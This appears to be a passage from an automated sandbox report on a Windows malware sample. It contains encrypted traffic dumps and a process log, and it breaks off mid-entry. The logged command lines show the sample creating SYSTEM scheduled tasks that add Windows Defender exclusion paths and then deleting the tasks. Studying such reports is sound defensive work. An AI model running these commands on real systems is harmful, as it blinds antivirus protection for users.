                                                                                      Data Ascii: bpa```b=57%h%8f<`-=S+8-<H/c$m|k(xkxc"__#d`+Eb+LhI8+h1zpS=d`5````p0```p+HX^__#d`b+L!LOhi Aje )k*)\+\aB)P `
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 60 60 eb 25 68 30 ed ed 40 9d 9f 9f 31 88 00 df 60 60 e3 a4 6c a6 e5 f8 9e 9f 9f 60 d9 f9 a0 a0 a0 93 60 2d 1d 39 5e 5f 5f 53 0b c6 0b 0a ca a0 ca a0 ca a2 ca a0 ca a1 c8 a0 a0 a0 e0 6d 75 cc 1e 1f 1f b2 1f f5 74 92 e2 f0 69 65 70 1e 1f 1f 63 5d 70 1e 1f 1f 1f 95 e7 d3 20 09 11 a0 a0 a0 ca a0 2d 25 34 5e 5f 5f f0 2b ed ac 21 49 d0 a1 a0 a0 f1 2b f5 a8 21 62 d0 a1 a0 a0 f2 eb e5 f0 9e 9f 9f 30 9f 75 f8 12 62 70 e5 a0 15 67 53 a0 89 dc 60 60 60 eb ed f0 9e 9f 9f 31 9f b5 a4 ed a5 b0 2d 35 88 5d 5f 5f f2 48 c4 6c a0 a0 23 64 a4 25 60 d4 85 2d 25 88 5d 5f 5f f0 2d 6d cc 1e 1f 1f b1 88 6c 11 e2 f0 6d 75 78 1e 1f 1f b2 1f f5 b4 ad e5 f0 63 24 f0 0b f4 6d 65 cc 5e 5f 5f f0 2d 2d 38 5e 5f 5f f1 5f b5 68 d2 a2 b0 2b 35 84 5d 5f 5f 29 35 bc 5d 5f 5f 23 1d bc 9d 9f
                                                                                      Data Ascii: ``%h0@1``l``-9^__Smutiepc]p -%4^__+!I+!b0ubpgS```1-5]__Hl#d%`-%]__-mlmuxc$me^__--8^___h+5]__)5]__#
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: ac ac 35 eb 8c 53 a0 c0 4c c6 65 70 e3 80 61 e5 a0 15 6f ea 6d 4c c6 65 70 e0 a9 61 e8 ad 8c 06 a5 b0 fd 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 ac 2a e8 6b b5 1c 68 ea 8a e0 6b ad 1c 08 f5 e2 e0 e0 6b a5 e8 b0 6b ad 1c 08 a9 e1 e0 e0 6b a5 1c 6b 45 fd 62 a8 a0 f5 2b 4c f1 29 ed 5c ca a1 2b ed 5c 48 4f a1 a0 a0 2b 45 fd 63 6c 6c 6c 6c 6c 6c ac ac ac ac ac 35 eb 8c 31 e9 2d 9c ea 25 68 30 0a 61 eb 2d 9c 88 eb 60 60 60 eb 85 3d a2 64 60 6c 6c 6c 6c 6c f5 2b 4c f1 29 ed 5c 2b e5 5c 2b e8 a8 9b ed a8 d7 a5 48 c2 c9 a1 a0 2b ed 5c 48 f1 e1 e0 e0 6b b5 1c 6b a2 e4 e3 a5 e8 6b 05 bd 22 e4 e0 2c 2c b5 6b 0c 63 0c e8 69 ad 1c 6b a5 5c 23 d8 a4 a0 d5 aa 48 c9 a1 a0 a0 29 e5 58 4b a9 2b ed 5c 2b f1 a4 29 f5 58 2b e5 58 2b 45 fd a3 ac
                                                                                      Data Ascii: 5SLepaomLepacllllllllllllll+L)\+*khkkkkkEb+L)\+\HO+Ecllllll51-%h0a-```=d`lllll+L)\+\+H+\Hkkk",,kcik\#H)XK+\+)X+X+E
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: e3 98 1d 15 6a a7 65 0c 94 62 70 60 60 60 60 e3 5d 0c 94 62 70 60 14 41 08 12 74 60 60 5f b5 6c d2 a2 b0 2b 2d 44 5e 5f 5f 48 7c 5c 5f 5f 2b 2d 44 5e 5f 5f 48 ff 5d 5f 5f 2b ed 54 c4 69 ed e0 e0 e0 e0 bf be bb 6b 05 bd 22 e8 e0 2c 2c 2c 2c 2c 2c b5 6b 0c b1 69 ad 1c 6b ad 1c 08 23 5c 5f 5f 2b e5 a8 23 40 a1 25 60 d4 ac 2b ed 5c f1 48 53 3e a0 a0 23 64 a4 2b e5 5c 2b 45 fd a2 64 60 ac ac 35 eb 8c 88 67 60 60 60 88 71 60 60 60 3d a3 35 eb 8c d9 ad 2c 65 70 88 75 3c 61 a0 fd 63 f5 2b 4c c8 f0 d7 a0 b0 48 10 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6d ec a5 b0 48 d3 fd e1 e0 bd 23 b5 6b 0c 08 e7 e0 e0 e0 08 f1 e0 e0 e0 bd 23 b5 6b 0c 59 2c ac e5 f0 08 30 89 e1 e0 fd 63 f5 2b 4c c8 2f d7 a0 b0 48 d1 0d a0 a0 23 64 a4 fd 63 f5 2b 4c 19 6c ec a5 b0 48 90 cb a1 60 3d
                                                                                      Data Ascii: jebp````]bp`At``_l+-D^__H|\__+-D^__H]__+Tik",,,,,,kik#\__+#@%`+\HS>#d+\+Ed`5g```q```=5,epu<ac+LH#dc+LmH#k#kY,0c+L/H#dc+LlH`=
                                                                                      2025-01-09 00:54:45 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                                                      Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:19:52:09
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\2o63254452-763487230.06.exe"
                                                                                      Imagebase:0x140000000
                                                                                      File size:30'965'248 bytes
                                                                                      MD5 hash:0C3951CFE848EAD37F11600EE5195006
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:19:53:10
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:19:53:11
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:19:54:01
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Documents\BEqRkb.exe
                                                                                      Imagebase:0x140000000
                                                                                      File size:133'136 bytes
                                                                                      MD5 hash:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:19:54:12
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:23
                                                                                      Start time:19:54:13
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:24
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:25
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:26
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:27
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:28
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:29
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:30
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:31
                                                                                      Start time:19:54:14
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff697100000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:32
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:33
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:34
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:35
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Run /TN "Task1"
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:36
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f
                                                                                      Imagebase:0x7ff782b00000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:37
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:SCHTASKS /Delete /TN "Task1" /F
                                                                                      Imagebase:0x7ff76f990000
                                                                                      File size:235'008 bytes
                                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:38
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:39
                                                                                      Start time:19:54:15
                                                                                      Start date:08/01/2025
                                                                                      Path:C:\Windows\System32\reg.exe
